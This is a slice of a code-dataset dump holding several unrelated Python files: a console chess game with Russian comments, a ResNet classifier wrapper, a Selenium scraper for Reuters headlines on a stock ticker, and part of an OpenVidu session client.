walltime,queue_mode)\n\nUSAGE = 'python kickoff_noslip_central.py <unique_str> <queue_mode>'\n\nif __name__ == '__main__':\n\n if (len(sys.argv) != 3 ):\n raise Exception(\"Call like: \\n %s\" % USAGE)\n unique_str = sys.argv[1]\n queue_mode = sys.argv[2]\n \n kickoff('gladish@cims.nyu.edu', '24:00:00',unique_str, 'q')\n\n","repo_name":"BackupTheBerlios/glimmer-cism-svn","sub_path":"glimmer-cism-lanl/branches/plume_integration2/tests/petermann/task_scripts/kickoff_noslip_central.py","file_name":"kickoff_noslip_central.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32538794872","text":"\r\nimport colorama\r\nfrom colorama import Fore,Back,Style\r\ncolorama.init()\r\n\r\n\r\nfield = [[' ', ' ', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', ' ', ' ', ], #создали пустую матрицу\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ], \r\n ['8', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '8', ], #i - строка, j - столбец \r\n ['7', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '7', ],\r\n ['6', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '6', ],\r\n ['5', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '5', ],\r\n ['4', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '4', ],\r\n ['3', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '3', ],\r\n ['2', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '2', ],\r\n ['1', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', '1', ],\r\n [' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ],\r\n [' ', ' ', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', ' ', ' ' ]]\r\n\r\nboard = [[None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],\r\n [None,None,None,None,None,None,None,None],] \r\n\r\nCONST_COLOR_BLACK = 1\r\nCONST_COLOR_WHITE = -1\r\n\r\n\r\n\r\n\r\ndict_field = {\r\n 'a1': (9, 2), 'b1': (9, 3), 'c1': (9, 4), 'd1': (9, 5), 'e1': (9, 6), 'f1': (9, 7), 'g1': (9, 8), 'h1': (9, 9),'a2': (8, 2), 'b2': (8, 3), 'c2': (8, 4), \r\n 'd2': (8, 5), 'e2': (8, 6), 'f2': (8, 7), 'g2': (8, 8), 'h2': (8, 9), 'a3': (7, 2), 'b3': (7, 3), 'c3': (7, 4),'d3': (7, 5), 'e3': (7, 6), 'f3': (7, 7),\r\n 'g3': (7, 8), 'h3': (7, 9), 'a4': (6, 2), 'b4': (6, 3), 'c4': (6, 4), 'd4': (6, 5), 'e4': (6, 6), 'f4': (6, 7),'g4': (6, 8), 'h4': (6, 9), 'a5': (5, 2), \r\n 'b5': (5, 3), 'c5': (5, 4), 'd5': (5, 5), 'e5': (5, 6), 'f5': (5, 7), 'g5': (5, 8), 'h5': (5, 9), 'a6': (4, 2),'b6': (4, 3), 'c6': (4, 4), 'd6': (4, 5),\r\n 'e6': (4, 6), 'f6': (4, 7), 'g6': (4, 8), 'h6': (4, 9), 'a7': (3, 2), 'b7': (3, 3), 'c7': (3, 4), 'd7': (3, 5),'e7': (3, 6), 'f7': (3, 7), 'g7': (3, 8),\r\n 'h7': (3, 9), 'a8': (2, 2), 'b8': (2, 3), 'c8': (2, 4), 'd8': (2, 5), 'e8': (2, 6), 'f8': (2, 7), 'g8': (2, 8),'h8': (2, 9)\r\n }\r\n\r\n\r\n\r\ndef create_figure(color, current_i, current_j,type):\r\n figure = {\r\n 'owner_color' : color,\r\n 'owner_current_i' : current_i,\r\n 'owner_current_j' : current_j, \r\n 'type' : type, \r\n }\r\n return figure \r\n\r\ndef create_black_pawn(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'black_pawn')\r\ndef create_white_pawn(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'white_pawn')\r\ndef create_rook(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'rook')\r\ndef create_knight(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'knight')\r\ndef create_bishop(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'bishop')\r\ndef create_queen(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'queen')\r\ndef create_king(color,current_i,current_j):\r\n return create_figure(color,current_i,current_j,'king')\r\n\r\n\r\ndef black_pawn_check_moves(figure, i, j):\r\n if board[i][j] == None and (figure['owner_current_j'] == j):\r\n if (i - figure['owner_current_i'] == 2):\r\n if (figure['owner_current_i'] == 1) and board[i-1][j] == None:\r\n return True\r\n elif i - figure['owner_current_i'] == 1:\r\n return True\r\n else:\r\n return False\r\n\r\ndef black_pawn_check_attack(figure, i, j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color']:\r\n if figure['owner_current_j'] == j:\r\n return False\r\n if (i == figure['owner_current_i'] + 1) and (j == figure['owner_current_j'] + 1 or j == figure['owner_current_j'] - 1):\r\n return True\r\n else:\r\n return False\r\n \r\ndef white_pawn_check_moves(figure, i, j):\r\n if board[i][j] == None and (figure['owner_current_j'] == j):\r\n if (i - figure['owner_current_i'] == -2):\r\n if (figure['owner_current_i'] == 6) and board[i-1][j] == None:\r\n return True\r\n #field[i][j] = '♙'\r\n elif i - figure['owner_current_i'] == -1:\r\n return True\r\n else:\r\n return False\r\ndef white_pawn_check_attack(figure, i, j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color']:\r\n if figure['owner_current_j'] == j:\r\n return False\r\n if (i == figure['owner_current_i'] - 1) and (j == figure['owner_current_j'] + 1 or j == figure['owner_current_j'] - 1):\r\n return True\r\n else:\r\n return False\r\n \r\n \r\n#Rook - ладья\r\n\r\ndef rook_check_way(figure,i,j): \r\n if i == figure['owner_current_i']: #ходим вправо или влево\r\n if figure['owner_current_j'] < j:\r\n for col in (figure['owner_current_j'] + 1, j):\r\n if board[i][col] != None:\r\n return False\r\n return True\r\n elif figure['owner_current_j'] > j:\r\n for col in (j, figure['owner_current_j'] - 1):\r\n if board[i][col] != None :\r\n return False\r\n return True\r\n elif j == figure['owner_current_j']: #ходим вниз или вверх\r\n if figure['owner_current_i'] < i:\r\n for row in (figure['owner_current_i'] + 1, i):\r\n if board[row][j] != None:\r\n return False\r\n return True\r\n elif figure['owner_current_i'] > i:\r\n for row in (i, figure['owner_current_i'] - 1):\r\n if board[row][j] != None :\r\n return False\r\n return True\r\n \r\ndef rook_check_moves(figure,i,j):\r\n if board[i][j] != None:\r\n return False\r\n elif rook_check_way(figure,i,j):\r\n return True\r\n else:\r\n return False\r\n\r\ndef rook_check_attack(figure,i,j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color'] and rook_check_way(figure,i,j):\r\n return True\r\n return False\r\n\r\n# Knight - конь\r\ndef knight_check_moves(figure, i, j):\r\n d_row = abs(figure['owner_current_i'] - i)\r\n d_col = abs(figure['owner_current_j'] - j)\r\n if ((d_row == 1 and d_col == 2) or (d_row == 2 and d_col == 1)) and board[i][j] == None:\r\n return True\r\n return False\r\n\r\ndef knight_check_attack(figure, i, j):\r\n if board[i][j] == None:\r\n return False\r\n d_row = abs(figure['owner_current_i'] - i)\r\n d_col = abs(figure['owner_current_j'] - j)\r\n if (d_row == 1 and d_col == 2) or (d_row == 2 and d_col == 1):\r\n if board[i][j]['owner_color'] != figure['owner_color']:\r\n return True \r\n return False \r\n# Bishop - слон\r\n\r\ndef bishop_check_way(figure,i,j):\r\n def go_up(num):\r\n return num + 1\r\n def go_down(num):\r\n return num - 1 \r\n d_row = abs(figure['owner_current_i'] - i)\r\n d_col = abs(figure['owner_current_j'] - j)\r\n if d_row != d_col:\r\n return False\r\n if i > figure['owner_current_i']:\r\n i_mod = go_up\r\n else:\r\n i_mod = go_down\r\n if j > figure['owner_current_j']:\r\n j_mod = go_up\r\n else:\r\n j_mod = go_down \r\n target_i = figure['owner_current_i']\r\n target_j = figure['owner_current_j'] \r\n for m in range(d_row-1):\r\n target_i = i_mod(target_i)\r\n target_j = j_mod(target_j)\r\n if board[target_i][target_j] != None:\r\n return False\r\n return True\r\n\r\ndef bishop_check_moves(figure,i,j):\r\n if board[i][j] != None:\r\n return False\r\n elif bishop_check_way(figure,i,j):\r\n return True\r\n else:\r\n return False\r\n\r\ndef bishop_check_attack(figure,i,j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color'] and bishop_check_way(figure,i,j):\r\n return True\r\n return False\r\n\r\n\r\n# Queen - Ферзь \r\n\r\ndef queen_check_way(figure,i,j):\r\n if rook_check_way(figure,i,j) or bishop_check_way(figure,i,j):\r\n return True\r\n return False \r\n\r\ndef queen_check_moves(figure,i,j):\r\n if board[i][j] != None:\r\n return False\r\n elif queen_check_way(figure,i,j):\r\n return True\r\n else:\r\n return False\r\n\r\ndef queen_check_attack(figure,i,j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color'] and queen_check_way(figure,i,j):\r\n return True\r\n return False\r\n\r\n\r\n \r\n# King-король\r\n\r\ndef king_check_way(figure,i,j):\r\n if abs(figure['owner_current_i'] - i) > 1 and abs(figure['owner_current_j'] - j) > 1:\r\n return False\r\n if rook_check_way(figure,i,j) or bishop_check_way(figure,i,j):\r\n return True\r\n return False \r\n\r\ndef king_check_moves(figure,i,j):\r\n if board[i][j] != None:\r\n return False\r\n elif king_check_way(figure, i,j):\r\n return True\r\n else:\r\n return False\r\n\r\ndef king_check_attack(figure,i,j):\r\n if board[i][j] == None:\r\n return False\r\n if board[i][j]['owner_color'] != figure['owner_color'] and king_check_way(figure,i,j):\r\n return True\r\n return False\r\n\r\n\r\ndict_figure_types = {\r\n 'black_pawn' : [black_pawn_check_moves,black_pawn_check_attack],\r\n 'white_pawn' : [white_pawn_check_moves,white_pawn_check_attack],\r\n 'rook' : [rook_check_moves,rook_check_attack],\r\n 'knight' : [knight_check_moves,knight_check_attack],\r\n 'bishop' : [bishop_check_moves,bishop_check_attack],\r\n 'queen' : [queen_check_moves,queen_check_attack],\r\n 'king' : [king_check_moves,king_check_attack]\r\n}\r\n\r\n\r\ndef board_to_field():\r\n global field, board\r\n for cell in dict_field.keys():\r\n i_field = dict_field[cell][0]\r\n j_field = dict_field[cell][1]\r\n i_board = i_field - 2\r\n j_board = j_field - 2\r\n if board[i_board][j_board] == None:\r\n field[i_field][j_field] = '.'\r\n elif (board[i_board][j_board]['type']== 'black_pawn'):\r\n field[i_field][j_field] = 'p'\r\n elif (board[i_board][j_board]['type']== 'white_pawn'):\r\n field[i_field][j_field] = 'P' \r\n elif (board[i_board][j_board]['type']== 'rook') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n field[i_field][j_field] = 'r' \r\n elif (board[i_board][j_board]['type']== 'rook') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n field[i_field][j_field] = 'R' \r\n elif (board[i_board][j_board]['type']== 'bishop') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n field[i_field][j_field] = 'b' \r\n elif (board[i_board][j_board]['type']== 'bishop') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n field[i_field][j_field] = 'B'\r\n elif (board[i_board][j_board]['type']== 'knight') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n field[i_field][j_field] = 'n' \r\n elif (board[i_board][j_board]['type']== 'knight') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n field[i_field][j_field] = 'N'\r\n elif (board[i_board][j_board]['type']== 'queen') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n field[i_field][j_field] = 'q' \r\n elif (board[i_board][j_board]['type']== 'queen') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n field[i_field][j_field] = 'Q'\r\n elif (board[i_board][j_board]['type']== 'king') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n field[i_field][j_field] = 'k' \r\n elif (board[i_board][j_board]['type']== 'king') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n field[i_field][j_field] = 'K'\r\n\r\n\r\n\r\n\r\ndef create_board():\r\n global board\r\n i = 1\r\n for j in range(8):\r\n board[i][j] = create_black_pawn(CONST_COLOR_BLACK,i,j)\r\n i = 6\r\n for j in range(8):\r\n board[i][j] = create_white_pawn(CONST_COLOR_WHITE,i,j)\r\n board[0][0] = create_rook(CONST_COLOR_BLACK, 0, 0)\r\n board[0][7] = create_rook(CONST_COLOR_BLACK, 0, 7)\r\n board[7][0] = create_rook(CONST_COLOR_WHITE, 7, 0)\r\n board[7][7] = create_rook(CONST_COLOR_WHITE, 7, 7)\r\n board[0][1] = create_knight(CONST_COLOR_BLACK, 0, 1)\r\n board[0][6] = create_knight(CONST_COLOR_BLACK, 0, 6)\r\n board[7][1] = create_knight(CONST_COLOR_WHITE, 7, 1)\r\n board[7][6] = create_knight(CONST_COLOR_WHITE, 7, 6)\r\n board[0][2] = create_bishop(CONST_COLOR_BLACK, 0, 2)\r\n board[0][5] = create_bishop(CONST_COLOR_BLACK, 0, 5)\r\n board[7][2] = create_bishop(CONST_COLOR_WHITE, 7, 2)\r\n board[7][5] = create_bishop(CONST_COLOR_WHITE, 7, 5)\r\n board[0][3] = create_queen(CONST_COLOR_BLACK, 0, 3)\r\n board[0][4] = create_king(CONST_COLOR_BLACK, 0, 4)\r\n board[7][3] = create_queen(CONST_COLOR_WHITE, 7, 3)\r\n board[7][4] = create_king(CONST_COLOR_WHITE, 7, 4)\r\n\r\n\r\ndef print_field():\r\n board_to_field()\r\n for i in range(12):\r\n print (' '.join(field[i]))\r\n\r\ndef move(coord1,coord2,color):\r\n current_i = dict_field[coord1][0] - 2\r\n current_j = dict_field[coord1][1] - 2\r\n i = dict_field[coord2][0] - 2\r\n j = dict_field[coord2][1] - 2\r\n if board[current_i][current_j] == None:\r\n print(\"На этом месте нет фигуры\")\r\n return False\r\n if board[current_i][current_j]['owner_color'] != color:\r\n print('Вы ходите вражеской фигурой')\r\n return False\r\n figure = board[current_i][current_j]\r\n check_moves = dict_figure_types[figure['type']][0]\r\n check_attack = dict_figure_types[figure['type']][1]\r\n if check_moves(figure,i,j) or check_attack(figure,i,j):\r\n board[i][j] = board[current_i][current_j]\r\n board[current_i][current_j] = None\r\n board[i][j]['owner_current_i'] = i\r\n board[i][j]['owner_current_j'] = j\r\n return True\r\n else:\r\n print('Ход невозможен')\r\n return False\r\n\r\ndef figure_color(counter):\r\n color = ''\r\n if (counter % 2 != 0):\r\n color = 'белых' \r\n else:\r\n color = 'черных'\r\n return color\r\n\r\ndef find_king(color):\r\n king_i = 0\r\n king_j = 0\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n if board[i][j] is None:\r\n continue\r\n if (board[i][j]['type'] == 'king') and board[i][j]['owner_color'] == color:\r\n king_i = i\r\n king_j = j\r\n return king_i,king_j\r\n\r\ndef check(color,x=None,y=None):\r\n if x is None or y is None: \r\n king_i,king_j = find_king(color)\r\n else:\r\n king_i = x\r\n king_j = y\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n if board[i][j] == None:\r\n continue\r\n figure = board[i][j]\r\n check_attack = dict_figure_types[figure['type']][1]\r\n if board[i][j]['owner_color'] != color and check_attack(figure,king_i,king_j):\r\n return True,i,j\r\n return False, i, j\r\n\r\ndef coord_generator(king_i,king_j, attack_i,attack_j):\r\n if attack_i == king_i: #ходим вправо или влево\r\n if king_j < attack_j:\r\n for col in range(king_j + 1, attack_j):\r\n yield attack_i,col\r\n elif king_j > attack_j:\r\n for col in range(attack_j, king_j - 1):\r\n yield attack_i,col\r\n elif attack_j == king_j: #ходим вниз или вверх\r\n if king_i < attack_i:\r\n for row in range(king_i + 1, attack_i):\r\n yield row,attack_j\r\n elif king_i > attack_i:\r\n for row in range(attack_i, king_i - 1):\r\n yield row,attack_j\r\n else:\r\n def go_up(num):\r\n return num + 1\r\n def go_down(num):\r\n return num - 1 \r\n d_row = abs(king_i - attack_i)\r\n if king_i > attack_i:\r\n i_mod = go_up\r\n else:\r\n i_mod = go_down\r\n if king_j > attack_j:\r\n j_mod = go_up\r\n else:\r\n j_mod = go_down \r\n target_i = attack_i\r\n target_j = attack_j\r\n for m in range(d_row-1):\r\n target_i = i_mod(target_i)\r\n target_j = j_mod(target_j)\r\n yield target_i,target_j\r\n\r\n\r\n\r\ndef mate(color,attack_i,attack_j):\r\n king_i,king_j = find_king(color)\r\n move = False\r\n king = board[king_i][king_j]\r\n king_check_moves = dict_figure_types[king['type']][0]\r\n\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n king_move = king_check_moves(king,i,j)\r\n if king_move:\r\n board[i][j]=board[king_i][king_j]\r\n king_check = check(color,i,j)\r\n if not king_check:\r\n move = True\r\n board[king_i][king_j]=board[i][j]\r\n cover = False\r\n if not board[attack_i][attack_j]['type'] == 'knight':\r\n for x,y in coord_generator(king_i,king_j, attack_i,attack_j):\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n if board[i][j] == None:\r\n continue\r\n figure = board[i][j]\r\n check_moves = dict_figure_types[figure['type']][0]\r\n if board[i][j]['owner_color'] == color and check_moves(figure,x,y):\r\n board[x][y] = board[i][j]\r\n if not check(color,king_i,king_j):\r\n cover = True \r\n board[i][j]=board[x][y]\r\n cont_attack = False\r\n for i in range(len(board)):\r\n for j in range(len(board)):\r\n\r\n if board[i][j] == None:\r\n continue\r\n figure = board[i][j]\r\n check_attack = dict_figure_types[figure['type']][1]\r\n if board[i][j]['owner_color'] == color and check_attack(figure,attack_i,attack_j):\r\n attacker = board[attack_i][attack_j]\r\n board[attack_i][attack_j] = board[i][j]\r\n if not check(color,king_i,king_j):\r\n cont_attack = True \r\n board[i][j] = board[attack_i][attack_j]\r\n board[attack_i][attack_j] = attacker\r\n if move or cover or cont_attack:\r\n return False\r\n return True \r\n\r\n\r\ndef help(x_coord,y_coord):\r\n board_to_field()\r\n figure = board[x_coord][y_coord]\r\n check_attack = dict_figure_types[figure['type']][1]\r\n check_moves = dict_figure_types[figure['type']][0]\r\n for i in range(12):\r\n for j in range(12):\r\n if i == x_coord+2 and j == y_coord+2:\r\n print(Fore.GREEN + field[i][j]+Style.RESET_ALL, end = ' ')\r\n continue\r\n if (i<2) or (i>9) or (j<2) or (j>9):\r\n print(field[i][j], end = ' ')\r\n continue\r\n if check_attack(figure,i-2,j-2) or check_moves(figure,i-2,j-2):\r\n print(Back.GREEN + field[i][j]+Style.RESET_ALL, end = ' ')\r\n continue \r\n print(field[i][j], end = ' ')\r\n print()\r\n\r\n\r\ndef game():\r\n def black_or_white_color(counter):\r\n if counter % 2 != 0:\r\n return CONST_COLOR_WHITE\r\n else:\r\n return CONST_COLOR_BLACK \r\n def black_or_white_str(counter):\r\n if counter % 2 != 0:\r\n return 'белых'\r\n else:\r\n return 'черных'\r\n counter = 1 \r\n create_board()\r\n print_field()\r\n win = False\r\n while not win:\r\n coord = []\r\n coord.append(input(f'Введите координаты фигуры {black_or_white_str(counter)}: ').lower())\r\n if coord[0] in dict_field:\r\n x_coord = dict_field[coord[0]][0] - 2\r\n y_coord = dict_field[coord[0]][1] - 2\r\n if board[x_coord][y_coord] is not None:\r\n if board[x_coord][y_coord]['owner_color'] == black_or_white_color(counter):\r\n help(x_coord,y_coord)\r\n else:\r\n print('Неверно выбрана фигура')\r\n continue\r\n else:\r\n print('Неверно выбрана фигура')\r\n continue\r\n else:\r\n print('Нет такой координаты')\r\n continue\r\n coord.append(input('Введите ход: ').lower())\r\n if move(coord[0],coord[1],black_or_white_color(counter)):\r\n print_field()\r\n counter += 1\r\n is_checked, attack_i, attack_j = check(black_or_white_color(counter))\r\n if is_checked:\r\n print(f'Королю {black_or_white_str(counter)} поставлен шах') \r\n if board[attack_i][attack_j] != black_or_white_color(counter) and mate(black_or_white_color(counter),attack_i,attack_j): \r\n print(f'Королю {black_or_white_str(counter)} поставлен мат')\r\n print('Игра закончена')\r\n win = True\r\n \r\n \r\ngame()\r\n","repo_name":"NadiaNurm/UniversityProjects","sub_path":"chess/НурминскаяШахматы.py","file_name":"НурминскаяШахматы.py","file_ext":"py","file_size_in_byte":21821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26680389042","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport importlib\n\n\ndef class_for_name(module_name, class_name):\n # load the module, will raise ImportError if module cannot be loaded\n m = importlib.import_module(module_name)\n # get the class, will raise AttributeError if class cannot be found\n return getattr(m, class_name)\n\n\nclass ResNet(nn.Module):\n def __init__(self, out_dim, encoder='resnet50', pretrained=True):\n super(ResNet, self).__init__()\n self.pretrained = pretrained\n assert encoder in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152'], \"Incorrect encoder type\"\n\n resnet = class_for_name(\"torchvision.models\", encoder)(pretrained=pretrained)\n\n # last_layer = list(resnet.children())[-1]\n # print(last_layer)\n self.resnet = torch.nn.Sequential(*(list(resnet.children())[:-1]))\n self.last_layer = nn.Linear(in_features=2048, out_features=out_dim, bias=True)\n\n def forward(self, x):\n x = self.resnet(x)\n x = x.squeeze(3).squeeze(2)\n x = self.last_layer(x)\n\n return x\n\n\nif __name__ == '__main__':\n # import torchvision.models\n # model = torchvision.models.resnet152(pretrained=True)\n # # print(model)\n #\n # input = torch.randn(5, 3, 384, 512)\n # output = model(input)\n\n #\n # print('\\n')\n # newmodel = torch.nn.Sequential(*(list(model.children())[:-1]))\n # print(newmodel)\n\n resnet = ResNet(out_dim=4)\n input = torch.randn(5, 3, 384, 512)\n output = resnet(input)\n print('input.shape: {}'.format(input.shape))\n print('output.shape: {}'.format(output.shape))\n","repo_name":"rthapa-26/FGVC-Plant-Pathology-2020-challenge-dataset-","sub_path":"AppleDiseaseClassifyCode/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"936674874","text":"from selenium import webdriver\nimport pandas as pd\nimport numpy as np\nfrom utils import scroll\n\n\nclass Reuters:\n url_scheme = \"https://\"\n url_host = \"www.reuters.com/\"\n url_path = \"companies/\"\n driver_path = \"D:/talks-of-stocks/scrapers/chromedriver_win32/chromedriver.exe\"\n\n\n def __init__(self, ticker):\n self.ticker = ticker\n self.url = self.url_scheme + self.url_host + self.url_path + self.ticker + \".OQ/news\"\n self.driver = webdriver.Chrome(executable_path=self.driver_path)\n\n self.driver.implicitly_wait(30)\n\n\n def open_newsfeed(self):\n self.driver.get(self.url)\n scroll(self.driver, 5)\n\n\n def get_article_listings(self):\n self.article_listings = self.driver.find_elements_by_class_name(\"MarketStoryItem-container-3rpwz\")\n\n\n def get_data(self):\n self.data = []\n\n for article_listing in self.article_listings:\n # Store current article details\n article_details = []\n\n # Retrieve headline and first sentence\n article_listing_components = article_listing.text.split(\"\\n\")\n headline = article_listing_components[0]\n sentence = article_listing_components[1]\n\n # Retrieve current article href\n article = self.driver.find_element_by_link_text(headline)\n article_link = article.get_attribute(\"href\")\n\n # Open current article in a new tab\n self.driver.execute_script(\"window.open('');\")\n self.driver.switch_to_window(self.driver.window_handles[1])\n self.driver.get(article_link)\n\n # Retrieve article date\n date_components = self.driver.find_element_by_class_name(\"ArticleHeader_date\").text.split(\"/\")\n date = date_components[0][0:-1] # removes the space at the end\n\n # Go back to main article listings tab\n self.driver.close()\n self.driver.switch_to_window(self.driver.window_handles[0])\n\n # Store current article details\n article_details.append(date)\n article_details.append(headline)\n article_details.append(sentence)\n\n # Storing current article details in the dataset\n self.data.append(article_details)\n\n\n def export_data(self):\n # Obtaining individual columns\n data = np.array(self.data)\n dates = data[:, 0]\n headlines = data[:, 1]\n sentences = data[:, 2]\n column_headers = [\"Date\", \"Headline\", \"Sentence\"]\n\n # Pandas DataFrame wrapper\n self.dataset = pd.DataFrame(columns=column_headers)\n self.dataset[\"Date\"] = dates\n self.dataset[\"Headline\"] = headlines\n self.dataset[\"Sentence\"] = sentences\n\n # Exporting news data to CSV\n self.dataset.to_csv(self.ticker + \"_news.csv\", index=False)\n\n\naapl_scraper = Reuters(\"AAPL\")\naapl_scraper.open_newsfeed()\naapl_scraper.get_article_listings()\naapl_scraper.get_data()\naapl_scraper.export_data()\n","repo_name":"anishseeniraj/newspip","sub_path":"scrapers/Reuters.py","file_name":"Reuters.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38723779898","text":"\"\"\"OpenViduSession class.\"\"\"\nfrom typing import Iterator, List\nfrom datetime import datetime\nfrom threading import RLock\nfrom requests_toolbelt.sessions import BaseUrlSession\n\nfrom .exceptions import OpenViduSessionDoesNotExistsError, OpenViduConnectionDoesNotExistsError, OpenViduError\nfrom .openviduconnection import OpenViduConnection\n\n\nclass OpenViduSession(object):\n \"\"\"\n This object represents an OpenVidu Session.\n A session is a group of users sharing communicating each other.\n \"\"\"\n\n def __init__(self, session: BaseUrlSession, lock: RLock, data: dict):\n \"\"\"\n This is meant for internal use, thus you should not call it.\n Use `OpenVidu.get_session` to get an instance of this class.\n \"\"\"\n\n self._session = session\n self._data = data\n self._lock = lock # Sadly using this lock locks all other session objects as well\n\n def fetch(self):\n \"\"\"\n Updates every property of the OpenViduSession with the current status it has in OpenVidu Server. This is especially useful for getting the list of active connections to the OpenViduSession (get_connections()).\n To update every OpenViduSession object owned by OpenVidu object, call OpenVidu.fetch()\n\n :return: True if the OpenViduSession status has changed with respect to the server, False if not. This applies to any property or sub-property of the object\n \"\"\"\n with self._lock:\n r = self._session.get(f\"api/sessions/{self.id}\")\n\n if r.status_code == 404:\n self._data = {}\n raise OpenViduSessionDoesNotExistsError()\n\n r.raise_for_status()\n\n is_changed = self._data != r.json()\n\n if is_changed:\n self._data = r.json()\n\n return is_changed\n\n def close(self):\n \"\"\"\n Gracefully closes the Session: unpublishes all streams and evicts every participant.\n Further calls to this object will fail.\n \"\"\"\n with self._lock:\n r = self._session.delete(f\"/api/sessions/{self.id}\")\n\n if r.status_code == 404:\n self._data = {}\n raise OpenViduSessionDoesNotExistsError()\n\n r.raise_for_status()\n self._data = {}\n\n @property\n def is_valid(self) -> bool:\n \"\"\"\n Checks if this session still existed on the server by the last call to fetch().\n\n :return: True if the session exists. False otherwise.\n \"\"\"\n with self._lock:\n return bool(self._data)\n\n def generate_token(self, role: str = 'PUBLISHER', data: str = None, video_max_recv_bandwidth: int = None,\n video_min_recv_bandwidth: int = None, video_max_send_bandwidth: int = None,\n video_min_send_bandwidth: int = None, allowed_filters: list = None) -> str:\n \"\"\"\n Gets a new token associated to Session.\n\n In the video bandwidth settings 0 means unconstrained. Setting any of them (other than None) overrides the values configured in for the server.\n\n https://docs.openvidu.io/en/2.12.0/reference-docs/REST-API/#post-apitokens\n\n :param role: Allowed values: `SUBSCRIBER`, `PUBLISHER` or `MODERATOR`\n :param data: metadata associated to this token (usually participant's information)\n :param video_max_recv_bandwidth: Maximum number of Kbps that the client owning the token will be able to receive from Kurento Media Server.\n :param video_min_recv_bandwidth: Minimum number of Kbps that the client owning the token will try to receive from Kurento Media Server.\n :param video_max_send_bandwidth: Maximum number of Kbps that the client owning the token will be able to send to Kurento Media Server.\n :param video_min_send_bandwidth: Minimum number of Kbps that the client owning the token will try to send to Kurento Media Server.\n :param allowed_filters: Array of strings containing the names of the filters the user owning the token will be able to apply.\n :return: The token as String.\n \"\"\"\n with self._lock:\n\n if not self._data: # Fail early... and always\n raise OpenViduSessionDoesNotExistsError()\n\n # Prepare parameters\n\n if role not in ['SUBSCRIBER', 'PUBLISHER', 'MODERATOR']:\n raise ValueError(f\"Role must be any of SUBSCRIBER, PUBLISHER or MODERATOR, not {role}\")\n\n parameters = {\"session\": self.id, \"role\": role}\n\n if data:\n parameters['data'] = data\n\n kurento_options = {\n \"videoMaxRecvBandwidth\": video_max_recv_bandwidth,\n \"videoMinRecvBandwidth\": video_min_recv_bandwidth,\n \"videoMaxSendBandwidth\": video_max_send_bandwidth,\n \"videoMinSendBandwidth\": video_min_send_bandwidth,\n \"allowedFilters\": allowed_filters\n }\n\n kurento_options = {k: v for k, v in kurento_options.items() if v is not None}\n\n if kurento_options:\n parameters['kurentoOptions'] = kurento_options\n\n # send request\n r = self._session.post('api/tokens', json=parameters)\n\n if r.status_code == 404:\n raise OpenViduSessionDoesNotExistsError()\n elif r.status_code == 400:\n raise ValueError()\n\n return r.json()['token']\n\n @property\n def connections(self) -> Iterator[OpenViduConnection]:\n \"\"\"\n Returns the list of active connections to the session.\n\n :return: A generator for OpenViduConnection objects.\n \"\"\"\n with self._lock:\n if not self._data:\n raise OpenViduSessionDoesNotExistsError()\n\n for connection_info in self._data['connections']['content']:\n yield OpenViduConnection(self._session, self.id, connection_info)\n\n def get_connection(self, connection_id: str) -> OpenViduConnection:\n \"\"\"\n 